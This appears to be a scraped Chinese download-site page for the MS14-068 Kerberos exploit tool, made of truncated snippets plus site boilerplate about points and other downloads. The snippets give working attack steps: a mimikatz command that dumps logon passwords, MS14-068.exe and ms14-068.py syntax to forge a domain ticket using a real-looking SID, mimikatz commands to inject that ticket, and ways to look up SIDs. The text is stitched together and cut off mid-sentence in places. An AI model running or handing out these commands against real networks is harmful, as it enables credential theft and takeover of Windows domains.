域用户与SIDmimikatz.exe"privilege::debug""log""sekurlsa::logonpasswords"# 利用ms14-068.exe 工具生成伪造的kerberos协议认证证书MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControl
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 运行完成将创建.ccache文件 查看注入票据前的权限 无法列出域控c盘内容,建议使用主机名,ip地址可能会报错 接下来用mm将票据注入到内存 kerberos::purge 系统中也可以清除的 kerberos::list kerberos::ptc 票据文件 klist查看是否...
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit SID获取方法: 1)wmic useraccount where name="USERNAME" get sid 2)whoami /all 本机可以直接查...
ms14-068.exe域内神器 安全技术 - 网络攻防Sc**tt 上传287.43 KB 文件格式 rar ms14-068.exe域内神器 点赞(0) 踩踩(0) 反馈 所需:3 积分 电信网络下载 madis w 软件安装包 2025-04-04 18:47:57 积分:1 高考倒计时工具 2025-04-05 02:26:02 积分:1 ...